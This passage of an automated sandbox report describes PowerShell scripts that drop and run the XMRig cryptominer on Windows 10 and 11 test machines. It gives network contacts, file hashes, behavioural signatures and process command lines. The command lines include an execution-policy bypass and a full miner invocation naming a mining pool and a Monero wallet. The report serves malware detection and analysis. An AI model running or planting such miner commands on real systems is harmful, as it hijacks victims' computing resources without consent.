| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.162.46.104.in-addr.arpa | udp |
Files
memory/4840-0-0x00007FFB9CE23000-0x00007FFB9CE25000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_oqyef2ao.atp.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4840-6-0x000001B774140000-0x000001B774162000-memory.dmp
memory/4840-11-0x00007FFB9CE20000-0x00007FFB9D8E1000-memory.dmp
memory/4840-12-0x00007FFB9CE20000-0x00007FFB9D8E1000-memory.dmp
memory/4840-14-0x00007FFB9CE20000-0x00007FFB9D8E1000-memory.dmp
memory/4840-16-0x000001B774180000-0x000001B77418A000-memory.dmp
memory/4840-15-0x000001B774520000-0x000001B774532000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/1904-47-0x0000021A27C40000-0x0000021A27C60000-memory.dmp
memory/1904-48-0x0000021A293B0000-0x0000021A293D0000-memory.dmp
memory/4840-49-0x00007FFB9CE23000-0x00007FFB9CE25000-memory.dmp
memory/4840-50-0x00007FFB9CE20000-0x00007FFB9D8E1000-memory.dmp
memory/1904-51-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-52-0x0000021A293D0000-0x0000021A293F0000-memory.dmp
memory/1904-53-0x0000021A293F0000-0x0000021A29410000-memory.dmp
memory/1904-54-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-55-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/4840-56-0x00007FFB9CE20000-0x00007FFB9D8E1000-memory.dmp
memory/1904-59-0x0000021A293F0000-0x0000021A29410000-memory.dmp
memory/1904-58-0x0000021A293D0000-0x0000021A293F0000-memory.dmp
memory/1904-57-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-60-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-61-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-62-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-63-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-64-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-65-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-66-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-67-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-68-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-69-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-70-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-71-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-72-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-73-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-74-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-75-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-76-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-77-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-78-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-79-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-80-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-81-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-82-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-83-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-84-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-85-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-86-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-87-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-88-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-89-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-90-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-91-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-92-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-93-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-94-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-95-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-96-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-97-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-98-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-99-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-100-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-101-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-102-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-103-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-104-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-105-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-106-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-107-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-108-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-109-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-110-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-111-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-112-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-113-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-114-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-115-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-116-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-117-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
memory/1904-118-0x00007FF6C1A70000-0x00007FF6C26A3000-memory.dmp
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win10v2004-20240426-en
Max time kernel
1797s
Max time network
1793s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4148 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4148 wrote to memory of 4032 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.111.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.143.123.92.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.219.191.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.65.42.20.in-addr.arpa | udp |
Files
memory/4148-0-0x00007FF992433000-0x00007FF992435000-memory.dmp
memory/4148-1-0x00000290FE2D0000-0x00000290FE2F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vjsiu44f.dj4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4148-11-0x00007FF992430000-0x00007FF992EF1000-memory.dmp
memory/4148-12-0x00007FF992430000-0x00007FF992EF1000-memory.dmp
memory/4148-14-0x00007FF992430000-0x00007FF992EF1000-memory.dmp
memory/4148-16-0x00000290FE4B0000-0x00000290FE4BA000-memory.dmp
memory/4148-15-0x00000290FF540000-0x00000290FF552000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4032-47-0x000002261BEB0000-0x000002261BED0000-memory.dmp
memory/4032-48-0x000002261D8B0000-0x000002261D8D0000-memory.dmp
memory/4148-50-0x00007FF992433000-0x00007FF992435000-memory.dmp
memory/4148-51-0x00007FF992430000-0x00007FF992EF1000-memory.dmp
memory/4032-49-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-52-0x000002261D8D0000-0x000002261D8F0000-memory.dmp
memory/4032-53-0x00000226B0490000-0x00000226B04B0000-memory.dmp
memory/4032-54-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4148-56-0x00007FF992430000-0x00007FF992EF1000-memory.dmp
memory/4032-55-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-57-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-58-0x000002261D8D0000-0x000002261D8F0000-memory.dmp
memory/4032-59-0x00000226B0490000-0x00000226B04B0000-memory.dmp
memory/4032-60-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-61-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-62-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-63-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-64-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-65-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-66-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-67-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-68-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-69-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-70-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-71-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-72-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-73-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-74-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-75-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-76-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-77-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-78-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-79-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-80-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-81-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-82-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-83-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-84-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-85-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-86-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-87-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-88-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-89-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-90-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-91-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-92-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-93-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-94-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-95-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-96-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-97-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-98-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-99-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-100-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-101-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-102-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-103-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-104-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-105-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-106-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-107-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-108-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-109-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-110-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-111-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-112-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-113-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-114-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-115-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-116-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-117-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
memory/4032-118-0x00007FF653080000-0x00007FF653CB3000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:42
Platform
win11-20240508-en
Max time kernel
1792s
Max time network
1796s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2564 wrote to memory of 1436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 2564 wrote to memory of 1436 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (8).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 52.111.227.14:443 | tcp |
Files
memory/2564-0-0x00007FFEE6673000-0x00007FFEE6675000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yjs5oexd.q12.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/2564-9-0x000002769CA10000-0x000002769CA32000-memory.dmp
memory/2564-10-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
memory/2564-11-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
memory/2564-12-0x00007FFEE6670000-0x00007FFEE7132000-memory.dmp
memory/2564-14-0x00000276B5220000-0x00000276B5232000-memory.dmp
memory/2564-15-0x00000276B5210000-0x00000276B521A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
